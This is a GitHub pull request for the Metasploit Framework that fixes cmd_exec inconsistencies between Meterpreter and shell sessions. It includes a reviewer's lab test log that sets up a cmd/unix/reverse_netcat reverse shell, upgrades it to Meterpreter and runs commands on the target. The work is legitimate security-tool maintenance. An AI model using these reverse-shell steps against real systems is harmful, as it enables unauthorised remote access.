
address cmd_exec inconsistencies with mettle/meterpreter payloads #9438

Merged
merged 2 commits into from
Jan 22, 2018

Conversation

busterb
Member

@busterb busterb commented Jan 21, 2018

Fixes #9429

This attempts to address the inconsistent behavior. Test cases are in the original issue.

@bcoles would you mind giving this a quick pass? Thanks!

This took a little while to push up, had some interesting CI corner cases that had to be fixed first. This should also fix the crash observed when running the new 'rename process' functionality from an injected process.

@bcoles
Contributor

bcoles commented Jan 21, 2018

Changes appear to work as described.

  • ✔️ Segfault: fixed
  • ✔️ Timeout: fixed
  • ✔️ cmd_exec cmd style invocation: fixed

I'll assume your CachedSize changes are sane (I love inexplicable unsigned integers as much as the next person, but perhaps there should be a constant for each payload platform defined somewhere ?).

Output, with Fedora 20 x64 test client:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set lport 1337
lport => 1337
msf5 exploit(multi/handler) > set lhost 172.16.191.244
lhost => 172.16.191.244
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.244:1337 
[*] Command shell session 1 opened (172.16.191.244:1337 -> 172.16.191.137:37488) at 2018-01-21 17:20:39 -0500


id
uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
^Z
Background session 1? [y/N]  y

msf5 exploit(multi/handler) > use exploit/linux/local/test
msf5 exploit(linux/local/test) > info

       Name: Test
     Module: exploit/linux/local/test
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  test

Available targets:
  Id  Name
  --  ----
  0   Auto

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.
  TIMEOUT  60               yes       Timeout (seconds)

Payload information:

Description:
  Test

msf5 exploit(linux/local/test) > run

[-] Exploit failed: The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/test) > set session 1
session => 1
msf5 exploit(linux/local/test) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "/bin/ls -l /etc/passwd"
command completed successfully
we made it to the end


[*] Exploit completed, but no session was created.

msf5 exploit(linux/local/test) > 

msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.191.244:4433 
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4433 -> 172.16.191.137:49883) at 2018-01-21 17:21:09 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/local/test) > sessions -k
[-] Please specify valid session identifier(s)
msf5 exploit(linux/local/test) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                       Connection
  --  ----  ----                   -----------                                                       ----------
  1         shell cmd/unix                                                                           172.16.191.244:1337 -> 172.16.191.137:37488 (172.16.191.137)
  2         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ localhost.localdomain  172.16.191.244:4433 -> 172.16.191.137:49883 (172.16.191.137)

msf5 exploit(linux/local/test) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > 
meterpreter > 
meterpreter > 
Background session 2? [y/N]  
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > set session 2
session => 2
msf5 exploit(linux/local/test) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "/bin/ls -l /etc/passwd"
command completed successfully
we made it to the end
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > 
msf5 exploit(linux/local/test) > use exploit/linux/local/test2
msf5 exploit(linux/local/test2) > set session 1
session => 1
rmsf5 exploit(linux/local/test2) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "/bin/echo" with args "some_initial_data && sleep 20 && echo true"
command completed successfully
we made it to the end
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/test2) > set session 2
session => 2
msf5 exploit(linux/local/test2) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Running command: "/bin/echo" with args "some_initial_data && sleep 20 && echo true"
command completed successfully
we made it to the end
[*] Exploit completed, but no session was created.

@busterb
Member Author

busterb commented Jan 22, 2018

Thanks for testing @bcoles , now on to the PHP payload :P

The CachedSize integers are generated by a script, and for legacy reasons, our spec tests are sticklers about those. I put those changes in a separate commit to make review easier. Let me noodle on a better way we might be able to solve the problem CachedSize solves, because I do feel like we're wasting valuable time as humans every time we update them.


@sempervictus sempervictus left a comment


Sometimes a rational fix devolves into a game of whackamole to find all the workarounds previously implemented... Thanks.

if d == ""
if (Time.now.to_i - start < time_out) && (o == '')

Seriously? Thank you...
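The two review-context lines quoted above describe a poll loop that keeps waiting only while no output has arrived and the timeout has not expired. The following is an added illustration of that shape, not code from metasploit-framework: FakeChannel and FakeClock are constructed stand-ins for a session channel and for Time.now, so the no-output and timeout cases run instantly.

```ruby
# Deterministic stand-in for Time.now: advances only when asked to sleep.
class FakeClock
  attr_reader :now
  def initialize; @now = 0; end
  def sleep(secs); @now += secs; end
end

# Constructed stand-in for a command channel. Each read hands back the next
# scripted chunk; nil means "no data yet"; an exhausted script means EOF
# (the process exited and the channel closed).
class FakeChannel
  def initialize(chunks); @chunks = chunks; end

  def read
    raise EOFError, 'channel closed' if @chunks.empty?
    @chunks.shift
  end
end

# Drain a command channel. Ends on EOF, on a timeout while nothing has been
# received, or on the first quiet read once some output has been seen.
# The last two conditions mirror the quoted `(now - start < time_out) && (o == '')`.
def read_command_output(chan, time_out, clock)
  o = ''
  start = clock.now
  loop do
    begin
      d = chan.read
    rescue EOFError
      break # command finished: return whatever was collected, even if empty
    end
    if d.nil? || d == ''
      # Nothing right now: keep polling only while we have seen no output at
      # all and the timeout has not expired. After output, silence means done.
      break unless (clock.now - start < time_out) && (o == '')
      clock.sleep(1)
      next
    end
    o += d
  end
  o
end

if __FILE__ == $0
  # A command that prints nothing and exits returns '' after 3 polls, not 60 s.
  clock = FakeClock.new
  puts read_command_output(FakeChannel.new([nil, nil, nil]), 60, clock).inspect
  puts "waited #{clock.now}s"
end
```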

@busterb busterb merged commit 69818ae into rapid7:master Jan 22, 2018
busterb added a commit that referenced this pull request Jan 22, 2018
@busterb
Member Author

busterb commented Jan 22, 2018

Release Notes

This fix resolves issues with the cmd_exec command behaving inconsistently with Meterpreter versus shell payloads. It also resolves some reverse_http issues when reconnecting via Linux/OSX native Meterpreter.

jmartin-tech pushed a commit to jmartin-tech/metasploit-framework that referenced this pull request Jan 24, 2018
@allrosenthal-r7 allrosenthal-r7 added the rn-fix release notes fix label Feb 7, 2018
Successfully merging this pull request may close these issues.

cmd_exec inconsistent behaviour between Meterpreter and Shell sessions